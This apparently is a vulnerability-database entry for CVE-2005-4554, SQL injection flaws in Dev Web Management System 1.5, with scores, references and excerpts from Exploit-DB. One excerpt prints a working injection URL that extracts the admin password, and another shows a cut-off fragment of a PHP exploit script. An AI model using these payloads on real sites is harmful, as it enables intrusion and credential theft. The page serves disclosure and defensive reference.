CVE-2005-4554
published 2005-12-28
Priority: P3 · 41 · high · 7.5 · CVSS 2.0
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 3.85% (88.8th percentile)
Multiple SQL injection vulnerabilities in DEV web management system 1.5 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) cat parameter in an openforum action (openforum.php) in index.php, (2) cat parameter in getfile.php, and (3) target parameter in download_now.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dev | dev_web_management_system | — | — |
No detection rules found.
Exploit-DB
Dev Web Management System 1.5 - 'getfile.php?cat' SQL Injection
exploitdb·2005-12-27
---
source: https://www.securityfocus.com/bid/16063/info
Dev Web Management System is prone to multiple input validation vulnerabilities. These issues may allow SQL injection and cross-site scripting attacks.
Dev Web Management System versions 1.5 and earlier are prone to these issues.
http://example.com/[path]/getfile.php?cat=%%'UNION%20SELECT%20value,value%20FROM%20variables1%20%20WHERE%20name='admin_password'/*
Exploit-DB
Dev Web Management System 1.5 - 'download_now.php?target' SQL Injection
exploitdb·2005-12-27
---
source: https://www.securityfocus.com/bid/16063/info
Dev Web Management System is prone to multiple input validation vulnerabilities. These issues may allow SQL injection and cross-site scripting attacks.
Dev Web Management System versions 1.5 and earlier are prone to these issues.
http://example.com/[path]/download_now.php?target=9999999999999[SQL]
Exploit-DB
Dev Web Management System 1.5 - 'cat' SQL Injection
exploitdb·2005-12-24
---
this works regardless of magic_quotes_gpc setting #
# usage: launch from Apache, fill in requested fields, then go! #
# #
# Sun-Tzu: "Prohibit the taking of omens, and do away with superstitious #
# doubts. Then, until death itself comes, no calamity need be feared." #
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 5);
ob_implicit_flush (1);
echo'********* Dev
body {background-color:#111111; SCROLLBAR-ARROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !i
No writeups or analysis indexed.
http://rgod.altervista.org/dev_15_sql_xpl.html
http://secunia.com/advisories/18239
http://securitytracker.com/id?1015410
http://www.osvdb.org/22040
http://www.osvdb.org/22041
http://www.osvdb.org/22042
http://www.securityfocus.com/archive/1/420253/100/0/threaded
http://www.securityfocus.com/bid/16063
https://exchange.xforce.ibmcloud.com/vulnerabilities/23898
Published: 2005-12-28